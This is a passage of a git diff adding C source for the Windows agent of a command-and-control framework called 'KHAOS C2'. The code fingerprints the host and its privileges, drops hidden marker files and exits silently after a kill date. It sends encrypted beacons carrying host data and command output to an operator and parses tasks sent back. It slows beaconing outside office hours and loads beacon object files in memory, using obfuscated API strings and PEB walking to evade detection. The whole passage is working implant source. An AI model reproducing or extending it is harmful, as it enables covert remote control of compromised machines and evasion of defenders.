osvi.dwMinorVersion, + osvi.dwBuildNumber, is64 ? "x64" : "x86"); + } + else + { + strncpy(buf, "Windows (unknown)", len - 1); + buf[len - 1] = '\0'; + } +} + +void agent_get_privileges(char *buf, size_t len) +{ + HANDLE token; + if (!adv_get()->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token)) + { + strncpy(buf, "user", len - 1); + buf[len - 1] = '\0'; + return; + } + TOKEN_ELEVATION elev; + DWORD ret_len = 0; + if (GetTokenInformation(token, TokenElevation, &elev, sizeof(elev), &ret_len) && elev.TokenIsElevated) + strncpy(buf, "elevated", len - 1); + else + strncpy(buf, "user", len - 1); + buf[len - 1] = '\0'; + CloseHandle(token); +} + +/* DJB2 hash for stable 8-hex agent ID */ + +static uint32_t djb2(const char *s) +{ + uint32_t h = 5381; + int c; + while ((c = (unsigned char)*s++) != 0) + h = ((h << 5) + h) ^ c; + return h; +} + +void agent_gen_id(char *id_out) +{ + char host[256], user[128]; + agent_get_hostname(host, sizeof(host)); + agent_get_username(user, sizeof(user)); + + BOOL elevated = FALSE; + HANDLE tok; + if (adv_get()->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) { + TOKEN_ELEVATION e; DWORD sz = sizeof(e); + if (GetTokenInformation(tok, TokenElevation, &e, sz, &sz)) + elevated = e.TokenIsElevated; + CloseHandle(tok); + } + + char combined[400]; + if (elevated) + snprintf(combined, sizeof(combined), "%s|%s|%lu", + host, user, (unsigned long)GetCurrentProcessId()); + else + snprintf(combined, sizeof(combined), "%s|%s", host, user); + + uint32_t h = djb2(combined); + snprintf(id_out, AGENT_ID_LEN + 1, "%08x", h); +} + +static void _parent_tmp_path(char *out, size_t sz) +{ + char tmp[MAX_PATH]; + GetTempPathA((DWORD)sizeof(tmp), tmp); + char host[256], user[128]; + agent_get_hostname(host, sizeof(host)); + agent_get_username(user, sizeof(user)); + char combined[400]; + snprintf(combined, sizeof(combined), "%s|%s", host, user); + uint32_t h = djb2(combined); + snprintf(out, sz, "%s~DF%08X.tmp", tmp, h); +} + +void agent_write_parent_id(const char *id) +{ + char path[MAX_PATH]; + _parent_tmp_path(path, sizeof(path)); + HANDLE f = CreateFileA(path, GENERIC_WRITE, 0, NULL, + CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); + if (f == INVALID_HANDLE_VALUE) return; + DWORD wr = 0; + WriteFile(f, id, (DWORD)strlen(id), &wr, NULL); + CloseHandle(f); +} + +static void _gs_tmp_path(char *out, size_t sz) +{ + char tmp[MAX_PATH]; + GetTempPathA((DWORD)sizeof(tmp), tmp); + char host[256], user[128]; + agent_get_hostname(host, sizeof(host)); + agent_get_username(user, sizeof(user)); + char combined[400]; + snprintf(combined, sizeof(combined), "%s|%s", host, user); + uint32_t h = djb2(combined); + snprintf(out, sz, "%s~GS%08X.tmp", tmp, h); +} + +void agent_write_gs_flag(void) +{ + char path[MAX_PATH]; + _gs_tmp_path(path, sizeof(path)); + HANDLE f = CreateFileA(path, GENERIC_WRITE, 0, NULL, + CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); + if (f != INVALID_HANDLE_VALUE) CloseHandle(f); +} + +int agent_read_gs_flag(void) +{ + char path[MAX_PATH]; + _gs_tmp_path(path, sizeof(path)); + if (GetFileAttributesA(path) == INVALID_FILE_ATTRIBUTES) return 0; + DeleteFileA(path); + return 1; +} + +int agent_gs_flag_exists(void) +{ + char path[MAX_PATH]; + _gs_tmp_path(path, sizeof(path)); + return GetFileAttributesA(path) != INVALID_FILE_ATTRIBUTES; +} + +/* agent lifecycle */ + +int agent_init(agent_ctx_t *ctx) +{ + memset(ctx, 0, sizeof(*ctx)); + + /* kill date check, exit silently if past configured timestamp */ +#if CFG_KILL_DATE_LEN > 1 + { + char kd_str[24] = {0}; + _cfg_decode(CFG_KILL_DATE, CFG_KILL_DATE_LEN, kd_str); + uint32_t kill_ts = (uint32_t)strtoul(kd_str, NULL, 10); + if (kill_ts > 0 && (uint32_t)time(NULL) > kill_ts) + ExitProcess(0); + } +#endif + + agent_gen_id(ctx->agent_id); + + ctx->parent_id[0] = '\0'; + { + char path[MAX_PATH]; + _parent_tmp_path(path, sizeof(path)); + HANDLE f = CreateFileA(path, GENERIC_READ, 0, NULL, + OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL); + if (f != INVALID_HANDLE_VALUE) { + DWORD rd = 0; + ReadFile(f, ctx->parent_id, AGENT_ID_LEN, &rd, NULL); + ctx->parent_id[AGENT_ID_LEN] = '\0'; + CloseHandle(f); + DeleteFileA(path); + } + } + + agent_get_hostname(ctx->hostname, sizeof(ctx->hostname)); + agent_get_username(ctx->username, sizeof(ctx->username)); + agent_get_os(ctx->os_info, sizeof(ctx->os_info)); + agent_get_privileges(ctx->privileges, sizeof(ctx->privileges)); + + ctx->pending_output = calloc(1, OUTPUT_BUF_SIZE); + if (!ctx->pending_output) + return -1; + + if (crypto_init(&ctx->crypto) != 0) + { + free(ctx->pending_output); + ctx->pending_output = NULL; + return -1; + } + + /* generate ECDH keypair for the handshake */ + if (crypto_gen_keypair(ctx->crypto.agent_pubkey, + ctx->crypto.agent_privkey) != 0) + { + crypto_free(&ctx->crypto); + free(ctx->pending_output); + ctx->pending_output = NULL; + return -1; + } + + return 0; +} + +void agent_free(agent_ctx_t *ctx) +{ + crypto_free(&ctx->crypto); + free(ctx->pending_output); + memset(ctx, 0, sizeof(*ctx)); +} + +/* output buffer */ + +void beacon_append_output(agent_ctx_t *ctx, const char *data, size_t len) +{ + if (ctx->output_len >= OUTPUT_BUF_SIZE - 1) + return; + size_t avail = OUTPUT_BUF_SIZE - ctx->output_len - 1; + if (len > avail) + len = avail; + memcpy(ctx->pending_output + ctx->output_len, data, len); + ctx->output_len += len; + ctx->pending_output[ctx->output_len] = '\0'; +} + +void beacon_clear_output(agent_ctx_t *ctx) +{ + memset(ctx->pending_output, 0, ctx->output_len + 1); + ctx->output_len = 0; +} + +/* JSON helpers */ + +/* escape a string for JSON, returns malloc'd buffer */ +static char *json_escape(const char *s) +{ + size_t in_len = strlen(s); + /* worst case: each char → \uXXXX = 6 bytes */ + char *out = malloc(in_len * 6 + 3); + if (!out) + return NULL; + char *p = out; + while (*s) + { + switch (*s) + { + case '"': + *p++ = '\\'; + *p++ = '"'; + break; + case '\\': + *p++ = '\\'; + *p++ = '\\'; + break; + case '\n': + *p++ = '\\'; + *p++ = 'n'; + break; + case '\r': + *p++ = '\\'; + *p++ = 'r'; + break; + case '\t': + *p++ = '\\'; + *p++ = 't'; + break; + default: + if ((unsigned char)*s < 0x20 || (unsigned char)*s >= 0x80) + { + /* escape control chars and non-ASCII as \u00xx */ + int _n = snprintf(p, 7, "\\u%04x", (unsigned char)*s); + if (_n > 0) + p += _n; + } + else + { + *p++ = *s; + } + } + s++; + } + *p = '\0'; + return out; +} + +/* packet builders */ + +/* plaintext handshake packet, base64-encoded for transport */ +char *beacon_build_handshake(agent_ctx_t *ctx) +{ + char *pubkey_b64 = base64_encode(ctx->crypto.agent_pubkey, X25519_KEY_SIZE); + if (!pubkey_b64) + return NULL; + + size_t needed = 128 + strlen(pubkey_b64); + char *pkt = malloc(needed); + if (!pkt) + { + free(pubkey_b64); + return NULL; + } + + snprintf(pkt, needed, + "{\"t\":\"h\",\"id\":\"%s\",\"pk\":\"%s\"}", + ctx->agent_id, pubkey_b64); + + free(pubkey_b64); + + /* base64-encode for transport */ + char *b64 = base64_encode((const uint8_t *)pkt, strlen(pkt)); + free(pkt); + return b64; +} + +/* build encrypted beacon: JSON → seal → base64 */ +char *beacon_build(agent_ctx_t *ctx) +{ + char *out_esc = json_escape(ctx->pending_output); + if (!out_esc) + return NULL; + + /* build JSON */ + size_t json_sz = 512 + strlen(out_esc) + strlen(ctx->hostname) + strlen(ctx->username) + strlen(ctx->os_info) + 32; + char *json = malloc(json_sz); + if (!json) + { + free(out_esc); + return NULL; + } + + snprintf(json, json_sz, + "{\"t\":\"s\"," + "\"id\":\"%s\"," + "\"hn\":\"%s\"," + "\"un\":\"%s\"," + "\"os\":\"%s\"," + "\"pr\":\"%s\"," + "\"lt\":\"%s\"," + "\"pid\":\"%s\"," + "\"po\":\"%s\"}", + ctx->agent_id, + ctx->hostname, + ctx->username, + ctx->os_info, + ctx->privileges, + ctx->last_task_id, + ctx->parent_id, + out_esc); + free(out_esc); + + /* encrypt */ + size_t sealed_len = 0; + uint8_t *sealed = crypto_seal(&ctx->crypto, + (const uint8_t *)json, strlen(json), + &sealed_len); + free(json); + if (!sealed) + return NULL; + + /* base64 for transport */ + char *b64 = base64_encode(sealed, sealed_len); + free(sealed); + return b64; +} + +/* response parser */ + +/* extract string value from flat JSON */ +static int json_get_str(const char *json, const char *key, + char *out, size_t out_sz) +{ + char search[128]; + snprintf(search, sizeof(search), "\"%s\":", key); + const char *p = strstr(json, search); + if (!p) + return -1; + p += strlen(search); + while (*p == ' ') + p++; + if (*p != '"') + return -1; + p++; + size_t i = 0; + while (*p && *p != '"' && i < out_sz - 1) + { + if (*p == '\\' && *(p + 1)) + { + p++; + } + out[i++] = *p++; + } + out[i] = '\0'; + return 0; +} + +/* same as json_get_str but heap-allocates output, caller frees */ +static int json_get_str_alloc(const char *json, const char *key, char **out) +{ + char search[128]; + snprintf(search, sizeof(search), "\"%s\":", key); + const char *p = strstr(json, search); + if (!p) + return -1; + p += strlen(search); + while (*p == ' ') + p++; + if (*p != '"') + return -1; + p++; + /* measure length */ + const char *start = p; + size_t len = 0; + while (*p && *p != '"') + { + if (*p == '\\' && *(p + 1)) + p++; + p++; + len++; + } + *out = (char *)malloc(len + 1); + if (!*out) + return -1; + /* copy */ + p = start; + size_t i = 0; + while (*p && *p != '"') + { + if (*p == '\\' && *(p + 1)) + p++; + (*out)[i++] = *p++; + } + (*out)[i] = '\0'; + return 0; +} + +/* parse inbound base64 packet, handles handshake and encrypted task */ +int beacon_parse_response(agent_ctx_t *ctx, const char *raw_b64, + char *cmd_out, size_t cmd_sz, + char *args_out, size_t args_sz, + char *task_id_out, size_t task_id_sz, + char **data_out) +{ + if (!raw_b64 || raw_b64[0] == '\0') + return -1; + + /* base64-decode the packet */ + size_t decoded_len = 0; + uint8_t *decoded = base64_decode(raw_b64, &decoded_len); + if (!decoded) + return -1; + + char *json = NULL; + + if (!ctx->handshake_done) + { + /* plaintext handshake response */ + json = (char *)decoded; + char type_buf[32] = {0}; + json_get_str(json, "t", type_buf, sizeof(type_buf)); + + if (strcmp(type_buf, "hr") == 0) + { + char spub_b64[64] = {0}; + if (json_get_str(json, "spk", spub_b64, sizeof(spub_b64)) == 0) + { + size_t spub_len = 0; + uint8_t *spub = base64_decode(spub_b64, &spub_len); + if (spub && spub_len == X25519_KEY_SIZE) + { + if (crypto_do_handshake(&ctx->crypto, spub) == 0) + ctx->handshake_done = 1; + } + free(spub); + } + } + free(decoded); + return ctx->handshake_done ? 0 : -1; + } + + /* encrypted task packet */ + size_t pt_len = 0; + uint8_t *pt = crypto_open(&ctx->crypto, decoded, decoded_len, &pt_len); + free(decoded); + if (!pt) + return -1; + + json = (char *)pt; + + char type_buf[32] = {0}; + json_get_str(json, "t", type_buf, sizeof(type_buf)); + + int ret = -1; + if (strcmp(type_buf, "t") == 0) + { + json_get_str(json, "tid", task_id_out, task_id_sz); + json_get_str(json, "c", cmd_out, cmd_sz); + json_get_str(json, "a", args_out, args_sz); + if (data_out) + json_get_str_alloc(json, "d", data_out); + ret = 0; + } + else if (strcmp(type_buf, "n") == 0) + { + cmd_out[0] = '\0'; + ret = 0; + } + + free(pt); + return ret; +} + +/* beacon sleep with jitter and work-hours gating */ + +void beacon_sleep(void) +{ +#if JITTER_PCT == 0 + beacon_sleep_obf(BEACON_INTERVAL); +#else + SYSTEMTIME st; + GetLocalTime(&st); + + BOOL off_hours = (st.wHour < 8 || st.wHour >= 20); + BOOL weekend = (st.wDayOfWeek == 0 || st.wDayOfWeek == 6); + + if (off_hours || weekend) + { + beacon_sleep_obf(BEACON_INTERVAL * 2); + return; + } + + /* BCryptGenRandom: cryptographic distribution, avoids predictable rand() */ + uint32_t rnd = 0; + BCryptGenRandom(NULL, (BYTE *)&rnd, sizeof(rnd), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + double jitter_range = BEACON_INTERVAL * (JITTER_PCT / 100.0); + double offset = jitter_range * (((double)(rnd & 0xFFFF) / 0xFFFF) * 2.0 - 1.0); + beacon_sleep_obf((DWORD)(BEACON_INTERVAL + (long)offset)); +#endif +} diff --git a/agent/src/bof/bof.c b/agent/src/bof/bof.c new file mode 100644 index 0000000..b7af705 --- /dev/null +++ b/agent/src/bof/bof.c @@ -0,0 +1,665 @@ +/* + * Copyright (c) 2026 + * KHAOS C2 - khaos.khaotic.fr + * + */ + +#include "bof.h" +#include "commands.h" +#include "crypto.h" +#include "adv_lazy.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include +#include + +#ifndef NTSTATUS +typedef LONG NTSTATUS; +#endif + +/* NtProtectVirtualMemory wrapper */ +typedef NTSTATUS(NTAPI *_bNtPVM_t)(HANDLE, PVOID *, PSIZE_T, ULONG, PULONG); +static BOOL _vp(LPVOID addr, SIZE_T sz, DWORD prot, DWORD *old) +{ + static _bNtPVM_t fn = NULL; + if (!fn) + { + char fs[24], ns[12]; + volatile unsigned char k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_NtProtectVirtualMemory); i++) + fs[i] = (char)(EVS_fn_NtProtectVirtualMemory[i] ^ k); + fs[sizeof(EVS_fn_NtProtectVirtualMemory)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_ntdll); i++) + ns[i] = (char)(EVS_dll_ntdll[i] ^ k); + ns[sizeof(EVS_dll_ntdll)] = '\0'; + HMODULE m = _peb_module(ns); + SecureZeroMemory(ns, sizeof(ns)); + if (m) + fn = (_bNtPVM_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + if (!fn) + return FALSE; + PVOID base = addr; + SIZE_T rsz = sz; + ULONG _old = 0; + NTSTATUS st = fn((HANDLE)(LONG_PTR)-1, &base, &rsz, (ULONG)prot, &_old); + if (old) + *old = (DWORD)_old; + return st == 0; +} + +/* COFF structures */ +#pragma pack(push, 1) +typedef struct +{ + WORD Machine; + WORD NumberOfSections; + DWORD TimeDateStamp; + DWORD PointerToSymbolTable; + DWORD NumberOfSymbols; + WORD SizeOfOptionalHeader; + WORD Characteristics; +} coff_hdr_t; + +typedef struct +{ + char Name[8]; + DWORD VirtualSize; + DWORD VirtualAddress; + DWORD SizeOfRawData; + DWORD PointerToRawData; + DWORD PointerToRelocations; + DWORD PointerToLineNumbers; + WORD NumberOfRelocations; + WORD NumberOfLineNumbers; + DWORD Characteristics; +} coff_sec_t; + +typedef struct +{ + DWORD VirtualAddress; + DWORD SymbolTableIndex; + WORD Type; +} coff_reloc_t; + +typedef struct +{ + union + { + char Short[8]; + struct + { + DWORD Zeros; + DWORD Offset; + } Long; + } Name; + DWORD Value; + SHORT SectionNumber; + WORD Type; + BYTE StorageClass; + BYTE NumberOfAuxSymbols; +} coff_sym_t; +#pragma pack(pop) + +#define IMAGE_FILE_MACHINE_AMD64 0x8664 +#define IMAGE_SCN_MEM_EXECUTE 0x20000000 +#define IMAGE_SCN_CNT_UNINIT_DATA 0x00000080 +#define IMAGE_REL_AMD64_ADDR64 0x0001 +#define IMAGE_REL_AMD64_ADDR32 0x0002 +#define IMAGE_REL_AMD64_ADDR32NB 0x0003 +#define IMAGE_REL_AMD64_REL32 0x0004 +#define IMAGE_REL_AMD64_REL32_1 0x0005 +#define IMAGE_REL_AMD64_REL32_2 0x0006 +#define IMAGE_REL_AMD64_REL32_3 0x0007 +#define IMAGE_REL_AMD64_REL32_4 0x0008 +#define IMAGE_REL_AMD64_REL32_5 0x0009 + +typedef struct +{ + char *orig; + char *buf; + int len; + int sz; +} datap; + +static char *g_out = NULL; +static size_t g_out_sz = 0; +static size_t g_out_off = 0; + +static void _append(const char *s, size_t n) +{ + if (!g_out) + return; + size_t av = g_out_sz - g_out_off - 1; + if (n > av) + n = av; + memcpy(g_out + g_out_off, s, n); + g_out_off += n; + g_out[g_out_off] = '\0'; +} + +static void __cdecl _bp_printf(int t, const char *fmt, ...) +{ + (void)t; + char tmp[8192]; + va_list va; + va_start(va, fmt); + int n = vsnprintf(tmp, sizeof(tmp) - 1, fmt, va); + va_end(va); + if (n > 0) + _append(tmp, (size_t)n); +} + +static void __cdecl _bp_output(int t, const char *data, int len) +{ + (void)t; + if (len > 0) + _append(data, (size_t)len); +} + +static int __cdecl _bp_is_admin(void) +{ + HANDLE tok; + TOKEN_ELEVATION e = {0}; + DWORD rl; + if (!adv_get()->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) + return 0; + GetTokenInformation(tok, TokenElevation, &e, sizeof(e), &rl); + CloseHandle(tok); + return (int)e.TokenIsElevated; +} + +static void __cdecl _bp_data_parse(datap *p, char *buf, int sz) +{ + if (p) + { + p->orig = buf; + p->buf = buf; + p->len = sz; + p->sz = sz; + } +} + +static char *__cdecl _bp_data_extract(datap *p, int *out_len) +{ + if (!p || p->len < 4) + return NULL; + int n = *(int *)p->buf; + p->buf += 4; + p->len -= 4; + if (n > p->len) + n = p->len; + char *r = p->buf; + p->buf += n; + p->len -= n; + if (out_len) + *out_len = n; + return r; +} + +static int __cdecl _bp_data_int(datap *p) +{ + if (!p || p->len < 4) + return 0; + int v = *(int *)p->buf; + p->buf += 4; + p->len -= 4; + return v; +} +static short __cdecl _bp_data_short(datap *p) +{ + if (!p || p->len < 2) + return 0; + short v = *(short *)p->buf; + p->buf += 2; + p->len -= 2; + return v; +} +static int __cdecl _bp_data_len(datap *p) { return p ? p->len : 0; } + +typedef struct +{ + const unsigned char *enc; + size_t n; + void *ptr; +} api_entry_t; + +static const api_entry_t k_api[] = { + {EVS_str_BeaconPrintf, sizeof(EVS_str_BeaconPrintf), (void *)_bp_printf}, + {EVS_str_BeaconOutput, sizeof(EVS_str_BeaconOutput), (void *)_bp_output}, + {EVS_str_BeaconIsAdmin, sizeof(EVS_str_BeaconIsAdmin), (void *)_bp_is_admin}, + {EVS_str_BeaconDataParse, sizeof(EVS_str_BeaconDataParse), (void *)_bp_data_parse}, + {EVS_str_BeaconDataExtract, sizeof(EVS_str_BeaconDataExtract), (void *)_bp_data_extract}, + {EVS_str_BeaconDataInt, sizeof(EVS_str_BeaconDataInt), (void *)_bp_data_int}, + {EVS_str_BeaconDataShort, sizeof(EVS_str_BeaconDataShort), (void *)_bp_data_short}, + {EVS_str_BeaconDataLength, sizeof(EVS_str_BeaconDataLength), (void *)_bp_data_len}, + {NULL, 0, NULL}}; + +static void _sym_name(const coff_sym_t *sym, const char *strtab, char *out, size_t outsz) +{ + if (sym->Name.Long.Zeros == 0) + strncpy(out, strtab + sym->Name.Long.Offset, outsz - 1); + else + { + size_t n = strnlen(sym->Name.Short, 8); + if (n >= outsz) + n = outsz - 1; + memcpy(out, sym->Name.Short, n); + out[n] = '\0'; + } +} + +static void *_resolve_win32(const char *fn, const char *dll_hint) +{ + for (int i = 0; k_api[i].enc; i++) + { + char name[20]; + volatile unsigned char _k = EVS_KEY; + for (size_t j = 0; j < k_api[i].n; j++) + name[j] = (char)(k_api[i].enc[j] ^ _k); + name[k_api[i].n] = '\0'; + int match = (strcmp(fn, name) == 0); + SecureZeroMemory(name, sizeof(name)); + if (match) + return k_api[i].ptr; + } + + HMODULE hm = NULL; + if (dll_hint && dll_hint[0]) + { + hm = _peb_module(dll_hint); + if (!hm) + hm = LoadLibraryA(dll_hint); + } + else + { + static const char *tries[] = { + "kernel32.dll", "ntdll.dll", "advapi32.dll", + "user32.dll", "ws2_32.dll", "ole32.dll", "shell32.dll", NULL}; + for (int i = 0; tries[i]; i++) + { + hm = _peb_module(tries[i]); + if (hm && GetProcAddress(hm, fn)) + break; + hm = NULL; + } + } + return hm ? (void *)GetProcAddress(hm, fn) : NULL; +} + +static int _parse_sym(const char *name, char *dll, size_t dll_sz, + char *fn, size_t fn_sz) +{ + int is_imp = (strncmp(name, "__imp_", 6) == 0); + const char *p = is_imp ? name + 6 : name; + + /* check for Beacon* prefix */ + { + volatile unsigned char _k = EVS_KEY; + if (strlen(p) >= sizeof(EVS_str_Beacon) && + (unsigned char)p[0] == (unsigned char)(EVS_str_Beacon[0] ^ _k) && + (unsigned char)p[1] == (unsigned char)(EVS_str_Beacon[1] ^ _k) && + (unsigned char)p[2] == (unsigned char)(EVS_str_Beacon[2] ^ _k) && + (unsigned char)p[3] == (unsigned char)(EVS_str_Beacon[3] ^ _k) && + (unsigned char)p[4] == (unsigned char)(EVS_str_Beacon[4] ^ _k) && + (unsigned char)p[5] == (unsigned char)(EVS_str_Beacon[5] ^ _k)) + { + strncpy(fn, p, fn_sz - 1); + dll[0] = '\0'; + return is_imp; + } + } + + const char *d = strchr(p, '$'); + if (d) + { + size_t dl = (size_t)(d - p); + if (dl >= dll_sz - 5) + dl = dll_sz - 6; + memcpy(dll, p, dl); + dll[dl] = '\0'; + /* lowercase and append .dll if missing */ + for (size_t i = 0; i < dl; i++) + dll[i] = (char)tolower((unsigned char)dll[i]); + if (!strstr(dll, ".")) + strncat(dll, ".dll", dll_sz - strlen(dll) - 1); + strncpy(fn, d + 1, fn_sz - 1); + } + else + { + dll[0] = '\0'; + strncpy(fn, p, fn_sz - 1); + } + return is_imp; +} + +#define THUNK_PTR_SZ 8 /* function pointer */ +#define THUNK_JMP_SZ 14 /* FF 25 00 00 00 00 + 8-byte addr */ + +typedef struct +{ + BYTE *ptr; /* RW: 8-byte fn pointer */ + BYTE *jmp; /* RX: 14-byte jmp trampoline */ +} thunk_pair_t; + +static BYTE *g_thunk_block = NULL; +static DWORD g_thunk_count = 0; + +static int _build_thunks(const coff_hdr_t *hdr, const coff_sym_t *symtab, + const char *strtab, thunk_pair_t *pairs) +{ + DWORD ext = 0; + for (DWORD si = 0; si < hdr->NumberOfSymbols; + si += 1 + symtab[si].NumberOfAuxSymbols) + { + const coff_sym_t *sym = symtab + si; + if (sym->SectionNumber == 0 && sym->StorageClass == 2) + ext++; + } + if (!ext) + return 1; + g_thunk_count = ext; + + DWORD ptr_block = ext * THUNK_PTR_SZ; + DWORD jmp_block = ext * THUNK_JMP_SZ; + DWORD total = ptr_block + jmp_block + 64; /* tiny padding */ + + g_thunk_block = (BYTE *)VirtualAlloc(NULL, total, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!g_thunk_block) + return 0; + + BYTE *ptr_base = g_thunk_block; + BYTE *jmp_base = g_thunk_block + ptr_block; + + DWORD idx = 0; + for (DWORD si = 0; si < hdr->NumberOfSymbols; + si += 1 + symtab[si].NumberOfAuxSymbols) + { + const coff_sym_t *sym = symtab + si; + if (sym->SectionNumber != 0 || sym->StorageClass != 2) + continue; + + char sname[512] = {0}; + _sym_name(sym, strtab, sname, sizeof(sname)); + + char dll[64] = {0}, fn[256] = {0}; + _parse_sym(sname, dll, sizeof(dll), fn, sizeof(fn)); + + void *target = _resolve_win32(fn, dll[0] ? dll : NULL); + + BYTE *pt = ptr_base + idx * THUNK_PTR_SZ; + *(void **)pt = target; + + BYTE *jt = jmp_base + idx * THUNK_JMP_SZ; + jt[0] = 0xFF; + jt[1] = 0x25; + jt[2] = 0; + jt[3] = 0; + jt[4] = 0; + jt[5] = 0; + *(void **)(jt + 6) = target; + + pairs[si] = (thunk_pair_t){pt, jt}; + idx++; + } + + DWORD old; + _vp(jmp_base, jmp_block, PAGE_EXECUTE_READ, &old); + return 1; +} + +int cmd_bof(const char *coff_b64, const char *args_b64, + char *output_buf, size_t output_sz) +{ + if (!coff_b64 || !output_buf || !output_sz) + return -1; + output_buf[0] = '\0'; + + size_t coff_sz = 0; + uint8_t *coff = base64_decode(coff_b64, &coff_sz); + if (!coff || coff_sz < sizeof(coff_hdr_t)) + { + snprintf(output_buf, output_sz, "[bof] b64 decode fail\n"); + if (coff) + free(coff); + return -1; + } + + char *args = NULL; + int args_len = 0; + if (args_b64 && args_b64[0]) + { + size_t alen = 0; + args = (char *)base64_decode(args_b64, &alen); + args_len = (int)alen; + } + (void)args_len; + + const coff_hdr_t *hdr = (const coff_hdr_t *)coff; + if (hdr->Machine != IMAGE_FILE_MACHINE_AMD64) + { + snprintf(output_buf, output_sz, + "[bof] not x64 COFF (machine=0x%04X)\n", hdr->Machine); + free(coff); + if (args) + free(args); + return -1; + } + + const coff_sec_t *secs = (const coff_sec_t *)(coff + sizeof(coff_hdr_t)); + const coff_sym_t *symtab = (const coff_sym_t *)(coff + hdr->PointerToSymbolTable); + const char *strtab = (const char *)(symtab + hdr->NumberOfSymbols); + + WORD nsec = hdr->NumberOfSections; + BYTE **mapped = (BYTE **)calloc(nsec, sizeof(BYTE *)); + thunk_pair_t *pairs = (thunk_pair_t *)calloc( + hdr->NumberOfSymbols ? hdr->NumberOfSymbols : 1, sizeof(thunk_pair_t)); + + if (!mapped || !pairs) + goto fail; + + for (WORD i = 0; i < nsec; i++) + { + DWORD sz = secs[i].SizeOfRawData; + DWORD vsz = secs[i].VirtualSize ? secs[i].VirtualSize : sz; + if (!sz && !vsz) + continue; + DWORD alloc_sz = (sz > vsz ? sz : vsz) + 16; + + mapped[i] = (BYTE *)VirtualAlloc(NULL, alloc_sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!mapped[i]) + { + snprintf(output_buf, output_sz, "[bof] alloc fail sec %d\n", i); + goto fail; + } + + if (sz && secs[i].PointerToRawData) + memcpy(mapped[i], coff + secs[i].PointerToRawData, sz); + /* BSS (uninit data) stays zeroed from VirtualAlloc */ + } + + if (!_build_thunks(hdr, symtab, strtab, pairs)) + { + snprintf(output_buf, output_sz, "[bof] thunk alloc fail\n"); + goto fail; + } + + for (WORD i = 0; i < nsec; i++) + { + if (!mapped[i] || !secs[i].NumberOfRelocations) + continue; + const coff_reloc_t *relocs = + (const coff_reloc_t *)(coff + secs[i].PointerToRelocations); + + for (WORD ri = 0; ri < secs[i].NumberOfRelocations; ri++) + { + DWORD sym_idx = relocs[ri].SymbolTableIndex; + WORD type = relocs[ri].Type; + BYTE *site = mapped[i] + relocs[ri].VirtualAddress; + + if (sym_idx >= hdr->NumberOfSymbols) + continue; + const coff_sym_t *sym = symtab + sym_idx; + + BYTE *target = NULL; + int is_ext = (sym->SectionNumber == 0 && sym->StorageClass == 2); + + if (!is_ext && sym->SectionNumber > 0 && sym->SectionNumber <= nsec) + { + int si2 = sym->SectionNumber - 1; + if (mapped[si2]) + target = mapped[si2] + sym->Value; + } + + switch (type) + { + case IMAGE_REL_AMD64_ADDR64: + if (is_ext && pairs[sym_idx].ptr) + *(DWORD64 *)site = (DWORD64)(uintptr_t)pairs[sym_idx].ptr; + else if (target) + *(DWORD64 *)site += (DWORD64)(uintptr_t)target; + break; + + case IMAGE_REL_AMD64_ADDR32: + if (target) + *(DWORD *)site += (DWORD)(uintptr_t)target; + break; + + case IMAGE_REL_AMD64_ADDR32NB: + if (target) + *(DWORD *)site += (DWORD)((uintptr_t)target - (uintptr_t)_peb_self_base()); + break; + + case IMAGE_REL_AMD64_REL32: + case IMAGE_REL_AMD64_REL32_1: + case IMAGE_REL_AMD64_REL32_2: + case IMAGE_REL_AMD64_REL32_3: + case IMAGE_REL_AMD64_REL32_4: + case IMAGE_REL_AMD64_REL32_5: + { + DWORD addend = type - IMAGE_REL_AMD64_REL32; + BYTE *dest = NULL; + if (is_ext) + { + /* for __imp_ use ptr thunk, for direct refs use jmp thunk */ + char sname[512] = {0}; + _sym_name(sym, strtab, sname, sizeof(sname)); + int is_imp = (strncmp(sname, "__imp_", 6) == 0); + dest = is_imp ? pairs[sym_idx].ptr : pairs[sym_idx].jmp; + } + else + { + dest = target; + } + if (dest) + { + // internal section refs carry the section offset as existing site value + DWORD sec_addend = is_ext ? 0 : *(DWORD *)site; + *(DWORD *)site = (DWORD)((uintptr_t)dest + sec_addend + - ((uintptr_t)site + 4 + addend)); + } + break; + } + default: + break; + } + } + } + + for (WORD i = 0; i < nsec; i++) + { + if (!mapped[i]) + continue; + if (secs[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) + { + DWORD old; + DWORD sz = secs[i].SizeOfRawData ? secs[i].SizeOfRawData + : secs[i].VirtualSize; + _vp(mapped[i], sz + 16, PAGE_EXECUTE_READ, &old); + } + } + + typedef void(__cdecl * go_fn_t)(char *, int); + go_fn_t go_fn = NULL; + + for (DWORD si = 0; si < hdr->NumberOfSymbols && !go_fn; + si += 1 + symtab[si].NumberOfAuxSymbols) + { + const coff_sym_t *sym = symtab + si; + if (sym->SectionNumber <= 0) + continue; + + char sname[512] = {0}; + _sym_name(sym, strtab, sname, sizeof(sname)); + + if (strcmp(sname, "go") == 0) + { + int sec_idx = sym->SectionNumber - 1; + if (sec_idx < nsec && mapped[sec_idx]) + go_fn = (go_fn_t)(void *)(mapped[sec_idx] + sym->Value); + } + } + + if (!go_fn) + { + snprintf(output_buf, output_sz, "[bof] 'go' not found\n"); + goto fail; + } + + g_out = output_buf; + g_out_sz = output_sz; + g_out_off = 0; + +#ifdef _MSC_VER + __try + { + go_fn(args, args_len); + } + __except (EXCEPTION_EXECUTE_HANDLER) + { + size_t av = output_sz - g_out_off - 1; + if (av > 0) + { + char err[64]; + int n = snprintf(err, sizeof(err), + "[bof] exception 0x%08lX\n", + (unsigned long)GetExceptionCode()); + if (n > 0) + _append(err, (size_t)n); + } + } +#else + go_fn(args, args_len); +#endif + + g_out = NULL; + +fail: + if (mapped) + { + for (WORD i = 0; i < nsec; i++) + if (mapped[i]) + 